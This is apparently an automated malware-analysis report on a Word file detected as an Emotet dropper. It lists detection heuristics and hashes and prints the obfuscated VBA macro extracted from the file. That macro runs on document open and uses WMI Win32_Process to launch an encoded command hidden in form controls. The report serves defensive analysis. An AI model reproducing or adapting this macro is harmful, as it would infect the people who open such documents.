MALICIOUS
232
Risk Score
Heuristics 7
-
ClamAV: Doc.Dropper.Emotet-7572661-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Emotet-7572661-0
-
VBA project inside OOXML medium 3 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
Set Hgfvzjsefnnn = GetObject(Quaaasngkwx) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Private Sub Document_open() -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 8692 bytes |
SHA-256: f576441decd9c5abba082cf895d8072fa89005c5c54232d594e1e36d2c480702 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
105 of 177 identifiers look randomly generated (e.g. 'Zdyaifmhxkjji') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Eupvgyresx"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
pl34 _
= "{TipTopPo}"
j3u = Edmotpdqfkjxh + Auacaaomtv
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Mdmadoavics + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Qsioczduna)
ndko24 = "{TipTopPo}"
nsih6 = 239 + 893 + 636
akj3 = 868 + 756
kqkqn4 = (Ivxqrtswzq) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Kgjgidybdsji
Mplapgma.Pqsdmifqouiss
End Sub
Attribute VB_Name = "Yuqmslzswwycl"
Attribute VB_Base = "0{579E53AB-BE00-459F-8F0D-F494EBF40C6B}{34353EDD-D899-46E5-B121-745F0A40376F}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Mplapgma"
Function Pqsdmifqouiss()
pl34 _
= "{TipTopPo}"
j3u = Bjofvbhxhhko + Kxebzguhiid
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Poivfccvwpsk + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Zedoebhbhyg)
ndko24 = "{TipTopPo}"
nsih6 = 807 + 124 + 223
akj3 = 793 + 964
kqkqn4 = (Xuafbvisi) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Eleuoilqrs
Qssxvhhq = "/34//22/778//0//3/wi/34//22/778//0//3/nm/34//22/778//0//3/g/34//22/778//0//3/mt/34//22/778//0//3/" + ChrW(Int(wdKeyS)) + "/34//22/778//0//3/:w/34//22/778//0//3/in/34//22/778//0//3/32/34//22/778//0//3/_" + Yuqmslzswwycl.Vaumcniw + "r/34//22/778//0//3/oc/34//22/778//0//3/e/34//22/778//0//3/s/34//22/778//0//3/s"
pl34 _
= "{TipTopPo}"
j3u = Zwuzcutxi + Kpaghoeojudaf
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Gekzvdqwy + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Dquwwzdaifakg)
ndko24 = "{TipTopPo}"
nsih6 = 508 + 944 + 171
akj3 = 872 + 190
kqkqn4 = (Kjkwwpuwoo) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Gsutbpilou
Quaaasngkwx = Varxdtkcwm(Qssxvhhq)
pl34 _
= "{TipTopPo}"
j3u = Brxdamqi + Dljucipzxqwq
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Lzpgiixekkc + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Gunvpxsw)
ndko24 = "{TipTopPo}"
nsih6 = 698 + 358 + 246
akj3 = 348 + 180
kqkqn4 = (Nywjbdagkzi) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Xjzrxzbz
Set Hgfvzjsefnnn = GetObject(Quaaasngkwx)
pl34 _
= "{TipTopPo}"
j3u = Tzxxvzdfma + Cxwqcnkqtc
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Qzyjcjxbmb + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Ismsttnhmvyt)
ndko24 = "{TipTopPo}"
nsih6 = 682 + 875 + 999
akj3 = 584 + 338
kqkqn4 = (Yizntrjm) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Btdcdsxaochjb
Qvxgssfdwu = Yuqmslzswwycl.Igcttfmk.Tag
pl34 _
= "{TipTopPo}"
j3u = Yfknkqvg + Xwhnszpxtg
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Cefaxqhmxjnb + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Nmvhmongtodmc)
ndko24 = "{TipTopPo}"
nsih6 = 251 + 170 + 847
akj3 = 436 + 660
kqkqn4 = (Pbkihdghktey) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Nifoulcclt
Hunodmcel = Quaaasngkwx + ChrW(Int(wdKeyS)) + Yuqmslzswwycl.Kcayeyzlzbvf.Tag + Qvxgssfdwu
pl34 _
= "{TipTopPo}"
j3u = Bhevvreldf + Owjhskmqv
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Rhtstnmlgin + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Zdyaifmhxkjji)
ndko24 = "{TipTopPo}"
nsih6 = 196 + 747 + 874
akj3 = 414 + 347
kqkqn4 = (Fmlqtunnbzkx) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Ixaljiolliqv
Zwndiejpwjmo = Hunodmcel + Yuqmslzswwycl.Vaumcniw
pl34 _
= "{TipTopPo}"
j3u = Qhofmcqavggcn + Kamhfpcwxjsnc
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Bgusarqf + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Eafgyzhkitogj)
ndko24 = "{TipTopPo}"
nsih6 = 856 + 603 + 957
akj3 = 372 + 425
kqkqn4 = (Olrvtporsf) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Ueitvzjbo
Set Rcyklzqzxbej = Figrtjza(Zwndiejpwjmo)
pl34 _
= "{TipTopPo}"
j3u = Stkqamivh + Xtnpxdoyywegx
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Koqugakcpdzgw + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Wnsfqdrq)
ndko24 = "{TipTopPo}"
nsih6 = 705 + 697 + 790
akj3 = 715 + 931
kqkqn4 = (Qqkknnmicctfn) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Nrymyxsdxarn
Call Hgfvzjsefnnn. _
Create(NJ + Syopamaqcfbxq, Knufjdzrhwbo, Rcyklzqzxbej, Joaexpbogj, Dczbylbjgaqbu, Fldwzlfet)
pl34 _
= "{TipTopPo}"
j3u = Zkbeuepz + Hsrndejhxly
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Mtusvqia + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Gmxkwpfiq)
ndko24 = "{TipTopPo}"
nsih6 = 346 + 659 + 426
akj3 = 442 + 428
kqkqn4 = (Azkmxsqyv) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Djpkzltj
End Function
Function Figrtjza(Yuceucmd)
pl34 _
= "{TipTopPo}"
j3u = Otwuzfjs + Yceejsoh
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Dkpkdtlvwk + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Fbktetgsx)
ndko24 = "{TipTopPo}"
nsih6 = 343 + 432 + 657
akj3 = 889 + 102
kqkqn4 = (Dblrtzrs) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Mweemrgtnv
Set Figrtjza = GetObject(Yuceucmd)
pl34 _
= "{TipTopPo}"
j3u = Xpcvxrgbep + Ljhfqiyafyd
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Ifqwivledcg + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Qkfoojuwg)
ndko24 = "{TipTopPo}"
nsih6 = 682 + 557 + 780
akj3 = 651 + 400
kqkqn4 = (Ooqtsfymhfpm) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Wtymigbql
Figrtjza. _
showwindow = Mftvhljlzx + Ypmpgjyzk
pl34 _
= "{TipTopPo}"
j3u = Oufvobajd + Nhsmaogivbc
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Ecobpmyuxyyte + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Zpeknvauyw)
ndko24 = "{TipTopPo}"
nsih6 = 909 + 672 + 703
akj3 = 75 + 127
kqkqn4 = (Bgvgmnirm) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Uqltpittwuujg
End Function
Function Varxdtkcwm(Pqlgdwln)
pl34 _
= "{TipTopPo}"
j3u = Uxfgwhlullxpa + Dkgxhvxnbdt
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Kqgcqnotejq + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Beyqhxmi)
ndko24 = "{TipTopPo}"
nsih6 = 763 + 733 + 583
akj3 = 398 + 854
kqkqn4 = (Kqsdwjecc) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Jufvyntvzapid
Varxdtkcwm = Join$(Split(Pqlgdwln, "/34//22/778//0//3/"), NoLineBreakAfter)
pl34 _
= "{TipTopPo}"
j3u = Amnslqhuyfst + Zlhgrdnv
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Talvklegferz + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Ssrsrzhof)
ndko24 = "{TipTopPo}"
nsih6 = 964 + 944 + 552
akj3 = 955 + 436
kqkqn4 = (Mdeqdeequ) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Emjnamnniz
End Function
Function Syopamaqcfbxq()
pl34 _
= "{TipTopPo}"
j3u = Gqjgmyzwqol + Zdpybyjbwzob
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Eyupapqfmbs + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Nstbgboytjz)
ndko24 = "{TipTopPo}"
nsih6 = 921 + 315 + 988
akj3 = 395 + 596
kqkqn4 = (Xojquenkv) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Zlrbtrngehvjc
Tzaaekktrsey = ChrW(Int(wdKeyP))
pl34 _
= "{TipTopPo}"
j3u = Wxobwzpfkat + Rjdhulkmo
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Hshekcebc + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Shofvsbb)
ndko24 = "{TipTopPo}"
nsih6 = 78 + 602 + 653
akj3 = 838 + 746
kqkqn4 = (Zyobjzlepci) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Uerkvhwrw
Jiwzykczz = Tzaaekktrsey + Yuqmslzswwycl.Rkalqggkpr.ControlTipText + " -e "
pl34 _
= "{TipTopPo}"
j3u = Hdtvcjrhjem + Iwhndoih
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Usxxlqwfkub + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Kbsjvpnccwv)
ndko24 = "{TipTopPo}"
nsih6 = 474 + 412 + 192
akj3 = 502 + 723
kqkqn4 = (Acclciaqzce) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Qmzbrblhw
sser = Yuqmslzswwycl.Xtvuusmhxrqzi.Pages(0).Caption
pl34 _
= "{TipTopPo}"
j3u = Knhyhgxflvyt + Zrvnysptpopo
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Wexniumtrv + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Skxyusap)
ndko24 = "{TipTopPo}"
nsih6 = 68 + 941 + 12
akj3 = 205 + 863
kqkqn4 = (Idvkcrysjt) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Jgxkkiifzz
Syopamaqcfbxq = Varxdtkcwm(Jiwzykczz + StrReverse(sser))
pl34 _
= "{TipTopPo}"
j3u = Vctdkvsdptoq + Jjnxwmwxumvan
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Hzzurtsvcq + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Rzblxmcdxzhjk)
ndko24 = "{TipTopPo}"
nsih6 = 712 + 563 + 325
akj3 = 709 + 637
kqkqn4 = (Hhhkiwrhtowxd) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Kgemfxsaynk
End Function
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 56832 bytes |
SHA-256: a95c60b9f1b12ce0318b49db6f0149dba894f256011dde34f464c69e9153d383 |
|||
|
Detection
ClamAV:
Doc.Dropper.Emotet-7572661-0
Obfuscation or payload:
likely
389 of 708 identifiers look randomly generated (e.g. '_B_var_ZvvtbywxrexmyNxlqqzwqthbebD') — consistent with name-mangling obfuscation. Carved artifact contains 2 long base64-like blob(s).
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.